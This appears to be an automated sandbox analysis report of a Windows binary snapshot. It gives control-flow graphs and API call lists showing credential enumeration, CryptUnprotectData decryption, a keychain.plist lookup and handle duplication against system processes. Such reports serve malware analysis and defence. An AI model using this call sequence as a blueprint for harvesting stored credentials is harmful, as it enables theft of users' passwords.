40263 41ee6b 86 API calls 40260->40263 40261->40255 40264 41ee6b 86 API calls 40262->40264 40265 41f2e0 40263->40265 40264->40253 40267 41b1ca memset 40265->40267 40266->40251 40267->40253 40268->40194 40269->40194 40270->40194 40271->40188 40272->40189 40274 417044 40273->40274 40275 41705c 40273->40275 40277 416760 11 API calls 40274->40277 40279 417055 40274->40279 40276 417075 40275->40276 40278 41707a 11 API calls 40275->40278 40276->40200 40277->40279 40278->40274 40279->40200 40280->40232 40281->40205 40282->40205 40283->40205 40284->40205 40285->40205 40286->40223 40287->40207 40288->40221 40289->40231 40295 415cfe 40290->40295 40299 415d23 __aullrem __aulldvrm 40295->40299 40302 41628e 40295->40302 40296 4163ca 40309 416422 11 API calls 40296->40309 40298 416172 memset 40298->40299 40299->40296 40299->40298 40300 416422 10 API calls 40299->40300 40301 415cb9 10 API calls 40299->40301 40299->40302 40300->40299 40301->40299 40303 416520 40302->40303 40304 416527 40303->40304 40308 416574 40303->40308 40305 416544 40304->40305 40304->40308 40310 4156aa 11 API calls 40304->40310 40307 416561 memcpy 40305->40307 40305->40308 40307->40308 40308->40104 40309->40302 40310->40305 40332 41493c EnumResourceNamesW 37670 4287c1 37671 4287d2 37670->37671 37672 429ac1 37670->37672 37673 428818 37671->37673 37674 42881f 37671->37674 37688 425711 37671->37688 37684 425ad6 37672->37684 37740 415c56 11 API calls 37672->37740 37707 42013a 37673->37707 37735 420244 97 API calls 37674->37735 37679 4260dd 37734 424251 120 API calls 37679->37734 37681 4259da 37733 416760 11 API calls 37681->37733 37687 429a4d 37689 429a66 37687->37689 37694 429a9b 37687->37694 37688->37672 37688->37681 37688->37687 37690 422aeb memset memcpy memcpy 37688->37690 37692 4260a1 37688->37692 37703 4259c2 37688->37703 37706 425a38 37688->37706 37723 4227f0 memset memcpy 37688->37723 37724 422b84 15 API calls 37688->37724 37725 422b5d memset memcpy memcpy 37688->37725 37726 422640 13 API calls 37688->37726 37728 4241fc 11 API calls 37688->37728 37729 42413a 90 API calls 37688->37729 37736 415c56 11 API calls 37689->37736 37690->37688 37732 415c56 11 API calls 37692->37732 37695 429a96 37694->37695 37738 416760 11 API calls 37694->37738 37739 424251 120 API calls 37695->37739 37698 429a7a 37737 416760 11 API calls 37698->37737 37703->37684 37727 415c56 11 API calls 37703->37727 37706->37703 37730 422640 13 API calls 37706->37730 37731 4226e0 12 API calls 37706->37731 37708 42014c 37707->37708 37711 420151 37707->37711 37750 41e466 97 API calls 37708->37750 37710 420162 37710->37688 37711->37710 37712 4201b3 37711->37712 37713 420229 37711->37713 37714 4201b8 37712->37714 37715 4201dc 37712->37715 37713->37710 37716 41fd5e 86 API calls 37713->37716 37741 41fbdb 37714->37741 37715->37710 37719 4201ff 37715->37719 37747 41fc4c 37715->37747 37716->37710 37719->37710 37722 42013a 97 API calls 37719->37722 37722->37710 37723->37688 37724->37688 37725->37688 37726->37688 37727->37681 37728->37688 37729->37688 37730->37706 37731->37706 37732->37681 37733->37679 37734->37684 37735->37688 37736->37698 37737->37695 37738->37695 37739->37672 37740->37681 37742 41fbf1 37741->37742 37743 41fbf8 37741->37743 37746 41fc39 37742->37746 37765 4446ce 11 API calls 37742->37765 37755 41ee26 37743->37755 37746->37710 37751 41fd5e 37746->37751 37748 41ee6b 86 API calls 37747->37748 37749 41fc5d 37748->37749 37749->37715 37750->37711 37753 41fd65 37751->37753 37752 41fdab 37752->37710 37753->37752 37754 41fbdb 86 API calls 37753->37754 37754->37753 37756 41ee41 37755->37756 37757 41ee32 37755->37757 37766 41edad 37756->37766 37769 4446ce 11 API calls 37757->37769 37760 41ee3c 37760->37742 37763 41ee58 37763->37760 37771 41ee6b 37763->37771 37765->37746 37775 41be52 37766->37775 37769->37760 37770 41eb85 11 API calls 37770->37763 37772 41ee70 37771->37772 37773 41ee78 37771->37773 37828 41bf99 86 API calls 37772->37828 37773->37760 37776 41be6f 37775->37776 37777 41be5f 37775->37777 37782 41be8c 37776->37782 37807 418c63 memset memset 37776->37807 37806 4446ce 11 API calls 37777->37806 37779 41be69 37779->37760 37779->37770 37782->37779 37783 41bf3a 37782->37783 37784 41bed1 37782->37784 37794 41bee7 37782->37794 37810 4446ce 11 API calls 37783->37810 37786 41bef0 37784->37786 37789 41bee2 37784->37789 37788 41bf01 37786->37788 37786->37794 37787 41bf24 memset 37787->37779 37788->37787 37790 41bf14 37788->37790 37808 418a6d memset memcpy memset 37788->37808 37796 41ac13 37789->37796 37809 41a223 memset memcpy memset 37790->37809 37794->37779 37811 41a453 86 API calls 37794->37811 37795 41bf20 37795->37787 37797 41ac3f memset 37796->37797 37799 41ac52 37796->37799 37798 41acd9 37797->37798 37798->37794 37801 41ac6a 37799->37801 37812 41dc14 19 API calls 37799->37812 37802 41aca1 37801->37802 37813 41519d 37801->37813 37802->37798 37804 41acc0 memset 37802->37804 37805 41accd memcpy 37802->37805 37804->37798 37805->37798 37806->37779 37807->37782 37808->37790 37809->37795 37810->37794 37812->37801 37816 4175ed 37813->37816 37824 417570 SetFilePointer 37816->37824 37819 4151b3 37819->37802 37820 41760a ReadFile 37821 417637 37820->37821 37822 417627 GetLastError 37820->37822 37821->37819 37823 41763e memset 37821->37823 37822->37819 37823->37819 37825 4175b2 37824->37825 37826 41759c GetLastError 37824->37826 37825->37819 37825->37820 37826->37825 37827 4175a8 GetLastError 37826->37827 37827->37825 37828->37773 37829 417bc5 37830 417c61 37829->37830 37831 417bda 37829->37831 37831->37830 37832 417bf6 UnmapViewOfFile CloseHandle 37831->37832 37834 417c2c 37831->37834 37836 4175b7 37831->37836 37832->37831 37832->37832 37834->37831 37841 41851e 20 API calls 37834->37841 37837 4175d6 FindCloseChangeNotification 37836->37837 37838 4175c8 37837->37838 37839 4175df 37837->37839 37838->37839 37840 4175ce Sleep 37838->37840 37839->37831 37840->37837 37841->37834 39793 4147f3 39796 414561 39793->39796 39795 414813 39797 41456d 39796->39797 39798 41457f GetPrivateProfileIntW 39796->39798 39801 4143f1 memset _itow WritePrivateProfileStringW 39797->39801 39798->39795 39800 41457a 39800->39795 39801->39800

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 361 40de6e-40de71 359->361 361->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->377 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                APIs
                                • memset.MSVCRT ref: 0040DDAD
                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                • _wcsicmp.MSVCRT ref: 0040DEB2
                                • _wcsicmp.MSVCRT ref: 0040DEC5
                                • _wcsicmp.MSVCRT ref: 0040DED8
                                • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                • memset.MSVCRT ref: 0040DF5F
                                • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                • _wcsicmp.MSVCRT ref: 0040DFB2
                                • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                • API String ID: 594330280-3398334509
                                • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 ??3@YAXPAX@Z 585->588 590 413edb-413ee2 587->590 588->590 598 413ee4 590->598 599 413ee7-413efe 590->599 604 413ea2-413eae CloseHandle 592->604 596 413e61-413e68 593->596 597 413e37-413e44 GetModuleHandleW 593->597 596->592 602 413e6a-413e76 596->602 597->596 601 413e46-413e5c GetProcAddress 597->601 598->599 599->580 601->596 602->592 604->583
                                APIs
                                  • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                • memset.MSVCRT ref: 00413D7F
                                • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                • memset.MSVCRT ref: 00413E07
                                • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                • String ID: QueryFullProcessImageNameW$kernel32.dll
                                • API String ID: 912665193-1740548384
                                • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                APIs
                                • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                • memcpy.MSVCRT ref: 0040B60D
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                • String ID: BIN
                                • API String ID: 1668488027-1015027815
                                • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                APIs
                                  • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                  • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                  • Part of subcall function 00418680: ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                • ??3@YAXPAX@Z.MSVCRT ref: 00418803
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: ??3@DiskFreeSpace$FullNamePathVersionmalloc
                                • String ID:
                                • API String ID: 2947809556-0
                                • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                APIs
                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                • String ID:
                                • API String ID: 767404330-0
                                • Opcode ID: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                • Opcode Fuzzy Hash: e13bd3a8970da8505fcd32bc3817dd57930a815364b2861f31204fc1a755a47e
                                • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                APIs
                                • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: FileFind$FirstNext
                                • String ID:
                                • API String ID: 1690352074-0
                                • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                APIs
                                • memset.MSVCRT ref: 0041898C
                                • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: InfoSystemmemset
                                • String ID:
                                • API String ID: 3558857096-0
                                • Opcode ID: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                • Opcode Fuzzy Hash: d0407614e71e7ae135e22cefa727abc0102cb379ef2ade91b8070469c4ed11d1
                                • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 0 44553b-445558 call 44db70 3 445599-4455a2 0->3 4 44555a-44557c call 40c768 call 40bdb0 call 4135f7 0->4 5 4455a8-4455e3 memset call 403988 wcsrchr 3->5 6 4457fb 3->6 44 44558e-445594 call 444b06 4->44 45 44557e-44558c call 4136c0 call 41366b 4->45 15 4455e5 5->15 16 4455e8-4455f9 5->16 10 445800-445809 6->10 13 445856-44585f 10->13 14 44580b-44581e call 40a889 call 403e2d 10->14 18 445861-445874 call 40a889 call 403c9c 13->18 19 4458ac-4458b5 13->19 37 445823-445826 14->37 15->16 21 445672-445683 call 40a889 call 403fbe 16->21 22 4455fb-445601 16->22 49 445879-44587c 18->49 23 44594f-445958 19->23 24 4458bb-44592b memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 19->24 82 445685 21->82 83 4456b2-4456b5 call 40b1ab 21->83 31 445605-445607 22->31 32 445603 22->32 29 4459f2-4459fa 23->29 30 44595e-4459ce memset * 2 call 414c2e call 40b2cc call 409d1f call 409b98 23->30 132 44592d-445945 call 40b6ef 24->132 133 44594a 24->133 39 445a00-445aa1 memset * 2 call 414c2e call 40b2cc call 409d1f call 40b2cc call 40ae18 29->39 40 445b29-445b32 29->40 151 4459d0-4459e8 call 40b6ef 30->151 152 4459ed 30->152 31->21 43 445609-44560d 31->43 32->31 50 44584c-445854 call 40b1ab 37->50 51 445828 37->51 181 445b08-445b15 call 40ae51 39->181 52 445c7c-445c85 40->52 53 445b38-445b96 memset * 3 40->53 43->21 47 44560f-445641 call 4087b3 call 40a889 call 4454bf 43->47 44->3 45->44 148 445665-445670 call 40b1ab 47->148 149 445643-445663 call 40a9b5 call 4087b3 47->149 64 4458a2-4458aa call 40b1ab 49->64 65 44587e 49->65 50->13 66 44582e-445847 call 40a9b5 call 4087b3 51->66 59 445d1c-445d25 52->59 60 445c8b-445cf3 memset * 2 call 414c2e call 409d1f call 409b98 52->60 67 445bd4-445c72 call 414c2e call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 call 40b2cc call 409d1f call 445389 53->67 68 445b98-445ba0 53->68 87 445fae-445fb2 59->87 88 445d2b-445d3b 59->88 167 445cf5 60->167 168 445cfc-445d03 60->168 64->19 80 445884-44589d call 40a9b5 call 4087b3 65->80 135 445849 66->135 247 445c77 67->247 68->67 81 445ba2-445bcf call 4099c6 call 445403 call 445389 68->81 154 44589f 80->154 81->52 97 44568b-4456a4 call 40a9b5 call 4087b3 82->97 114 4456ba-4456c4 83->114 102 445d3d-445d65 call 409c52 call 40b2cc _wcsicmp 88->102 103 445d88-445e15 memset * 3 call 414c2e call 40b2cc call 409d1f call 409b98 88->103 156 4456a9-4456b0 97->156 161 445d67-445d6c 102->161 162 445d71-445d83 call 445093 102->162 196 445e17 103->196 197 445e1e-445e25 103->197 128 4457f9 114->128 129 4456ca-4456d3 call 413cfa call 413d4c 114->129 128->6 172 4456d8-4456f7 call 40b2cc call 413fa6 129->172 132->133 133->23 135->50 148->114 149->148 151->152 152->29 154->64 156->83 156->97 174 445fa1-445fa9 call 40b6ef 161->174 162->87 167->168 179 445d05-445d13 168->179 180 445d17 168->180 205 4456fd-445796 memset * 4 call 409c70 * 3 172->205 206 4457ea-4457f7 call 413d29 172->206 174->87 179->180 180->59 200 445b17-445b27 call 40aebe 181->200 201 445aa3-445ab0 call 40add4 181->201 196->197 202 445e27-445e59 call 40b2cc call 409d1f call 409b98 197->202 203 445e6b-445e7e call 445093 197->203 200->40 201->181 218 445ab2-445b03 memset call 40b2cc call 409d1f call 445389 201->218 242 445e62-445e69 202->242 243 445e5b 202->243 223 445f67-445f99 call 40b2cc call 409d1f call 409b98 203->223 205->206 246 445798-4457ca call 40b2cc call 409d1f call 409b98 205->246 206->10 218->181 223->87 255 445f9b 223->255 242->203 248 445e83-445ef5 memset call 40b2cc call 409d1f call 40ae18 242->248 243->242 246->206 265 4457cc-4457e5 call 4087b3 246->265 247->52 264 445f4d-445f5a call 40ae51 248->264 255->174 269 445ef7-445f04 call 40add4 264->269 270 445f5c-445f62 call 40aebe 264->270 265->206 269->264 274 445f06-445f38 call 40b2cc call 409d1f call 409b98 269->274 270->223 274->264 281 445f3a-445f48 call 445093 274->281 281->264
                                APIs
                                • memset.MSVCRT ref: 004455C2
                                • wcsrchr.MSVCRT ref: 004455DA
                                • memset.MSVCRT ref: 0044570D
                                • memset.MSVCRT ref: 00445725
                                  • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                  • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                  • Part of subcall function 0040BDB0: CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                  • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                  • Part of subcall function 0040BDB0: _wcsncoll.MSVCRT ref: 0040BE38
                                  • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                  • Part of subcall function 0040BDB0: memcpy.MSVCRT ref: 0040BEB2
                                  • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                • memset.MSVCRT ref: 0044573D
                                • memset.MSVCRT ref: 00445755
                                • memset.MSVCRT ref: 004458CB
                                • memset.MSVCRT ref: 004458E3
                                • memset.MSVCRT ref: 0044596E
                                • memset.MSVCRT ref: 00445A10
                                • memset.MSVCRT ref: 00445A28
                                • memset.MSVCRT ref: 00445AC6
                                  • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                  • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT ref: 004450BE
                                  • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                  • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT ref: 004450F0
                                  • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                • memset.MSVCRT ref: 00445B52
                                • memset.MSVCRT ref: 00445B6A
                                • memset.MSVCRT ref: 00445C9B
                                • memset.MSVCRT ref: 00445CB3
                                • _wcsicmp.MSVCRT ref: 00445D56
                                • memset.MSVCRT ref: 00445B82
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                  • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                  • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                • memset.MSVCRT ref: 00445986
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                Strings
                                Memory Dump Source
                                • Source File: 00000010.00000002.2560660031.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_16_2_400000_wab.jbxd
                                Similarity
                                • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateHandleProcSize_wcsicmp_wcslwr_wcsncollmemcpywcscatwcscpy
                                • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                • API String ID: 2745753283-3798722523
                                • Opcode ID: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                • Opcode Fuzzy Hash: 60142fc224ce82f33f024026baff3817031bc91c0ca8ee6e0e9eeeaa230f4715
                                • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                Control-flow Graph

                                APIs
                                  • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                  • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                  • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                  • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                • SetErrorMode.KERNELBASE(00008001), ref: 00412799
                                • GetModuleHandleW.KERNEL32(00000000,0041493C,00000000), ref: 004127B2
                                • EnumResourceTypesW.KERNEL32(00000000), ref: 004127B9
                                Strings
